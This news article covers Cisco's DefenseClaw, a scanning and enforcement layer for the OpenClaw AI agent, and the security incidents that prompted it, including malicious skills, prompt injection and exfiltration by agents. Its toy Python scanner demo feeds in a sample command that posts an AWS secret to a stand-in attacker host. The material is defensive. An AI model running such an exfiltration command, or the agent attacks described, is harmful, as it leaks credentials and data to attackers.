IBL News | New York

This month, Cisco launched DefenseClaw, a free, open-source security tool for OpenClaw that runs inside NVIDIA’s OpenShell.



In mid-March, at its GTC 2026 conference, NVIDIA announced NemoClaw and OpenShell to address OpenClaw’s security issues.

OpenShell provides the infrastructure-level sandbox that OpenClaw never had — kernel isolation, deny-by-default network access, YAML-based policy enforcement, and a privacy router that keeps sensitive data local.

It’s out-of-process enforcement, meaning the controls live outside the agent and can’t be overridden by it.
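To make the deny-by-default idea concrete, here is a minimal Python sketch. It does not reproduce OpenShell's policy format or API; the `NetworkPolicy` class and the host names are hypothetical, chosen only to show that anything not explicitly listed is refused.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class NetworkPolicy:
    """Hypothetical policy object: only hosts named here may be contacted."""

    allowed_hosts: frozenset = field(default_factory=frozenset)

    def permits(self, host: str) -> bool:
        # Deny by default: a host is allowed only if it is explicitly listed.
        return host.lower() in self.allowed_hosts


# Illustrative host names, not taken from any real configuration.
policy = NetworkPolicy(allowed_hosts=frozenset({"api.example.com"}))
print(policy.permits("api.example.com"))   # True
print(policy.permits("evil.example.net"))  # False
```

An empty policy permits nothing, which is the point of the design: access has to be granted, never revoked after the fact.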

Cisco Systems is building on that foundation. Its AI Defense team published research showing how malicious skills exploit the trust model through prompt injection, credential theft, and silent exfiltration, and released an open-source Skill Scanner so the community could start vetting what it installs.

OpenShell gives users a sandbox for the operational layer.



Sitting on top of OpenShell, Cisco introduced an open-source agentic governance layer, DefenseClaw, that scans everything before it runs. Every skill, every tool, every plugin, and every piece of code generated by the Claw gets scanned before it’s allowed into any Claw environment.

The scan engine includes five tools: skill-scanner, mcp-scanner, a2a-scanner, CodeGuard static analysis, and an AI bill of materials generator. Nothing bypasses the admission gate.
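The admission-gate pattern can be sketched roughly as follows. This is an illustration under stated assumptions, not DefenseClaw's code: the scanner names, the `substring_scanner` helper, and the `admit` function are all hypothetical, and the toy scanners only look for fixed substrings.

```python
from typing import Callable, Dict, List

# A scanner takes an artifact's text and returns a list of findings (empty = clean).
Scanner = Callable[[str], List[str]]


def substring_scanner(needle: str, label: str) -> Scanner:
    """Build a toy scanner that reports `label` when `needle` appears."""

    def scan(artifact: str) -> List[str]:
        return [label] if needle in artifact else []

    return scan


def admit(artifact: str, scanners: Dict[str, Scanner]) -> Dict[str, List[str]]:
    """Run every scanner and return findings keyed by scanner name.

    An empty result means the artifact passed every scanner and may be admitted.
    """
    findings: Dict[str, List[str]] = {}
    for name, scan in scanners.items():
        result = scan(artifact)
        if result:
            findings[name] = result
    return findings


# Hypothetical scanners standing in for real analysis tools.
scanners = {
    "toy-secret-scan": substring_scanner("AWS_SECRET", "hard-coded credential"),
    "toy-exfil-scan": substring_scanner("curl http://", "outbound upload"),
}

clean = admit("print('hello')", scanners)
dirty = admit("curl http://attacker.example -d $AWS_SECRET", scanners)
print(clean)          # {}
print(sorted(dirty))  # ['toy-exfil-scan', 'toy-secret-scan']
```

The gate admits an artifact only when every scanner returns no findings, so a single hit from any scanner is enough to keep it out.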

DefenseClaw detects threats at runtime — not just at the gate. Claws are self-evolving systems. A skill that was clean on Tuesday can start exfiltrating data on Thursday. DefenseClaw doesn’t assume what passed admission stays safe — a content scanner inspects every message flowing in and out of the agent at the execution loop itself.

Cisco explained:

“DefenseClaw enforces block and allow lists — and enforcement is not advisory. When you block a skill, its sandbox permissions are revoked, its files are quarantined, and the agent gets an error if it tries to invoke it. When you block an MCP server, the endpoint is removed from the sandbox network allow-list, and OpenShell denies all connections. This happens in under two seconds, no restart required. These aren’t suggestions. They’re walls.”

“And here’s the part that matters for anyone running Claws at scale: every claw is born observable.”

“DefenseClaw connects to Splunk out of the box. Every scan finding, every block/allow decision, every prompt-response pair, every tool call, every policy enforcement action, every alert — it all streams into Splunk as structured events the moment your claw comes online. You don’t bolt on observability after the fact and hope you covered everything. The telemetry is there from the beginning. The goal is simple: if your claw does something — anything — there’s a record.”
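The combination Cisco describes, hard enforcement plus a record of every decision, can be illustrated with a short Python sketch. The `Gate` class, its method names, and the event fields are assumptions made for this example; they are not DefenseClaw's interface, and the in-memory list merely stands in for a log pipeline such as Splunk.

```python
import json
import time


class Gate:
    """Hypothetical enforcement gate that logs every decision it makes."""

    def __init__(self):
        self.blocked = set()
        self.events = []  # stand-in for a structured-event stream

    def _record(self, action, skill):
        # Each decision becomes one JSON-encoded structured event.
        event = {"ts": time.time(), "action": action, "skill": skill}
        self.events.append(json.dumps(event, sort_keys=True))

    def block(self, skill):
        self.blocked.add(skill)
        self._record("block", skill)

    def invoke(self, skill):
        if skill in self.blocked:
            # Enforcement is not advisory: the call fails outright.
            self._record("deny", skill)
            raise PermissionError(f"skill '{skill}' is blocked")
        self._record("invoke", skill)
        return f"ran {skill}"


gate = Gate()
gate.invoke("notes")      # allowed, logged as "invoke"
gate.block("notes")       # logged as "block"
try:
    gate.invoke("notes")  # refused, logged as "deny"
except PermissionError as err:
    print(err)            # skill 'notes' is blocked
```

After this run, `gate.events` holds three entries, one per decision, which mirrors the stated goal that anything the agent does leaves a record.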

As an AI that reads personal files, manages tools, runs shell commands, and connects to platforms to build new capabilities, OpenClaw represents a paradigm shift — a new Jarvis — but it has also sparked one of the most concerning security crises in open-source history.

Within three weeks of going viral, OpenClaw suffered a wave of serious security incidents that led nation-states, agencies, and companies to restrict or stop running it.

“I purposefully didn’t make OpenClaw simpler, but at the end of the day, if you build a hammer… You can hurt yourself. So should we not build hammers anymore?” explained the Austrian programmer who created OpenClaw.

Reported vulnerabilities and incidents included:

• A critical remote code execution vulnerability; visiting a malicious webpage could hijack any agent.

• 135,000+ exposed OpenClaw instances on the public internet.

• A coordinated attack called ClawHavoc planted over 800 malicious skills in ClawHub, roughly 20 percent of the entire registry of productivity tools.

• A security researcher created a malicious third-party skill that performed data exfiltration and prompt injection without user awareness, demonstrating security flaws in OpenClaw implementations.

To its credit, OpenClaw has been transparent about the risks, and the team has patched issues rapidly. But the structural reality is problematic: an agent with full system access, broad network reach, and a community-contributed skill ecosystem is a magnet for hackers.